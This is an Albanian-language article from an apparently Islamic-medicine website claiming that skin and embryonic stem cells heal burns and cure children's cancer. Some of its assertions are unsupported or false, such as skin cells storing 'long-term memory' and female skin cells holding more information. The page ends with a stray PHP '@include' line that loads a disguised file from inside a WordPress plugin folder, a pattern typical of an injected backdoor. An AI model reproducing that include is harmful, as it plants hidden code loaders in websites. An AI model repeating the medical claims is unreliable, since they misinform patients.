Sexta-feira, 12/4/2024 | : : UTC+0
Mjeksia Islame
United States
+11C

Shërimi me përdorimin e qelizave të lëkurës

Shërimi me përdorimin e qelizave të lëkurës

lekura

Shërimi me përdorimin e qelizave të lëkurës

Sot shkencëtarët përpiqen të shfrytëzojnë qelizat e lëkurës të marra nga embrioni (qeliza amë). Këta besojnë që këto qeliza kanë efekt mrekullibërës në shërimin e djegieve. Gjithashtu, shkencëtarët përpiqen të realizojnë dobinë nga qelizat embrionale në fazat e hershme, pasi që kanë gjetur që ky është burim për trajtim të shumë sëmundjeve. Hulumtuesit përpiqen të modifikojnë ADN e qelizave të lëkurës për ta fshirë memorien e tyre duke i përgatitur kështu për implantim, por, gjithashtu për t’i ikur karcinomit. Sot shkencëtarët i klonojnë minjtë nga qelizat e lëkurës, pasi që këto qeliza janë në gjendje të mbajnë sasi të madhe të memories afatgjatë. Zbuluan se qelizat e lëkurës të femrës mbajnë më shumë informata se qelizat e lëkurës te meshkujt. Tani, shkencëtarët përpiqen të shfrytëzojnë qelizat e lëkurës për shërimin e fëmijëve të sëmurë nga kanceri nëpërmes qelizave të lëkurës të modifikuara gjenetikisht.
Këto qeliza kanë efekt të madh në shërimin e kancerit, përmirësojnë imunitetin dhe parandalojnë përparimin e sëmundjes.

@include "wp-content/plugins/wp-file-manager/lib/codemirror/mode/eiffel/include/7260.ed";